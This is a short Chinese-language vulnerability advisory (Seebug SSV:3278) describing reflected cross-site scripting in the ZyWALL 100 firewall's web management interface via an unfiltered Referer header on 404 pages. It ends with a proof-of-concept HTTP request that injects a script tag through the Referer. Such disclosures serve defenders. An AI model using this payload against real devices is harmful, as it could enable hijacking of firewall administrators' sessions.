ZyWALL 100 HTTP Referer头跨站脚本漏

2008-05-12T00:00:00
ID SSV:3278
Type seebug
Reporter Root
Modified 2008-05-12T00:00:00

Description

BUGTRAQ ID: 29110

Zywall是一款由Zyxel开发和维护的硬件防火墙。

ZyWALL基于Web的管理接口使用referer头生成404 Error页面。如果远程攻击者用特制的referer头请求了不存在的网页的话,应用程序就无法正确地过滤referer头中的数据,导致跨站脚本攻击,在客户端浏览器中执行脚本代码。

ZyXEL ZyWall 100 ZyXEL


目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

<a href=http://www.zyxel.com/index.php target=_blank>http://www.zyxel.com/index.php</a>

                                        
                                            
                                                GET&nbsp;/blah.htm&nbsp;HTTP/1.1
Host:&nbsp;www.site.com
Referer:&nbsp;blaaaa&quot;&gt;&lt;script&gt;alert(12345)&lt;/script&gt;aaaah.htm